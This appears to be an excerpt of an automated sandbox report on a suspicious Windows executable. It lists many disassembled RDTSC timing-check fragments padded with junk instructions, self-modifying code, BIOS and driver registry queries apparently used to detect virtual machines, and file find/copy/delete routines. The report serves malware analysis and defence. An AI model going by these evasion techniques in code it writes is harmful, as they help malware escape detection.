                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1373030 second address: 137306A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0F0527E406h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E417h 0x0000001b jmp 00007F0F0527E40Dh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDE38 second address: 13DDE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDF97 second address: 13DDFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0F0527E40Ch 0x0000000e ja 00007F0F0527E40Eh 0x00000014 push esi 0x00000015 pop esi 0x00000016 jnc 00007F0F0527E406h 0x0000001c push eax 0x0000001d push edx 0x0000001e jnc 00007F0F0527E406h 0x00000024 jmp 00007F0F0527E40Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E235A second address: 13E2361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E551B second address: 13E553B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Fh 0x0000000c jmp 00007F0F0527E40Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E553B second address: 13E5567 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 jmp 00007F0F04CBD329h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E99DC second address: 13E99F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E9B3A second address: 13E9B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0F04CBD316h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 142A2A6 second address: 142A2AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14371F9 second address: 14371FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14371FD second address: 143720D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0F04CBD316h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143720D second address: 1437216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1437216 second address: 143723F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0F04CBD316h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F0F04CBD31Eh 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a jns 00007F0F04CBD316h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143723F second address: 143724A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144192B second address: 144192F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144192F second address: 144193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F0F0527E40Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144193D second address: 1441941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1449178 second address: 144917F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A35 second address: 1452A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F0F04CBD316h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F04CBD321h 0x00000014 jno 00007F0F04CBD316h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A5B second address: 1452A7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F0F0527E406h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452A7E second address: 1452A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451232 second address: 145123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451404 second address: 1451420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F04CBD31Ch 0x0000000d jnl 00007F0F04CBD318h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517DA second address: 14517E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517E3 second address: 14517FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD327h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14517FE second address: 1451804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451804 second address: 145180A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145180A second address: 145180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145180E second address: 145183F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0F04CBD318h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007F0F04CBD31Eh 0x00000015 jp 00007F0F04CBD316h 0x0000001b push eax 0x0000001c pop eax 0x0000001d jbe 00007F0F04CBD31Ch 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C0 second address: 14519C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C4 second address: 14519C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519C8 second address: 14519CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519CE second address: 1451A50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F04CBD321h 0x00000008 jp 00007F0F04CBD316h 0x0000000e jng 00007F0F04CBD316h 0x00000014 jmp 00007F0F04CBD322h 0x00000019 popad 0x0000001a jng 00007F0F04CBD335h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 push edx 0x00000023 jmp 00007F0F04CBD324h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F0F04CBD31Fh 0x0000002f push esi 0x00000030 pop esi 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451A50 second address: 1451A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1452799 second address: 14527A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14570C1 second address: 14570C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14570C6 second address: 14570E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0F04CBD31Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F0F04CBD33Ah 0x00000010 jl 00007F0F04CBD31Eh 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A574 second address: 145A57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0F0527E406h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A57E second address: 145A587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A587 second address: 145A590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145A590 second address: 145A5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD324h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463C7D second address: 1463CAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 jnp 00007F0F0527E42Eh 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0F0527E418h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695B8 second address: 14695BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695BC second address: 14695C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695C6 second address: 14695CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14695CA second address: 14695CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1477597 second address: 14775D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F0F04CBD316h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F0F04CBD326h 0x00000014 jmp 00007F0F04CBD325h 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007F0F04CBD316h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841C1 second address: 14841C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841C5 second address: 14841CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841CF second address: 14841F9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d popad 0x0000000e je 00007F0F0527E43Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0F0527E406h 0x0000001c jnp 00007F0F0527E406h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14841F9 second address: 14841FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487AEA second address: 1487AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487AF2 second address: 1487B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD326h 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487C6C second address: 1487C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F0527E40Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487DE8 second address: 1487E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0F04CBD316h 0x0000000a ja 00007F0F04CBD318h 0x00000010 jns 00007F0F04CBD322h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E02 second address: 1487E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E12 second address: 1487E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E18 second address: 1487E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487E1C second address: 1487E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F0F04CBD31Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487F91 second address: 1487F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0F0527E406h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1487F9C second address: 1487FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD323h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14883E1 second address: 14883E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148869E second address: 14886B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0F04CBD316h 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007F0F04CBD316h 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14886B3 second address: 14886D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0F0527E41Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14886D9 second address: 14886DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148A239 second address: 148A23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148A23D second address: 148A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0F04CBD316h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148D0BB second address: 148D13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0F0527E419h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dl, 1Eh 0x0000002a push dword ptr [ebp+122D2F62h] 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F0F0527E408h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D2A70h], ecx 0x00000050 push F774DC86h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F0F0527E40Ah 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148D13A second address: 148D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E912 second address: 148E945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E411h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F0F0527E432h 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E945 second address: 148E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E94D second address: 148E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14903C5 second address: 14903CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0516 second address: 5AF051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF051A second address: 5AF051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF051E second address: 5AF0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0524 second address: 5AF0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0536 second address: 5AF0551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ah, E9h 0x0000000c mov al, dh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movsx edx, si 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF05E6 second address: 5AF05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF05FB second address: 5AF0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F0527E410h 0x0000000a sbb ax, CAE8h 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0622 second address: 5AF06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F04CBD325h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F0F04CBD31Ch 0x00000014 pushfd 0x00000015 jmp 00007F0F04CBD322h 0x0000001a sub ah, FFFFFFA8h 0x0000001d jmp 00007F0F04CBD31Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F0F04CBD329h 0x0000002a and eax, 4A634BC6h 0x00000030 jmp 00007F0F04CBD321h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF06AB second address: 5AF06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF06AF second address: 5AF06C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B042E second address: 13B0438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11FDADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 11FDB9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 13B7DEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 142BACD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-37390)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F11710
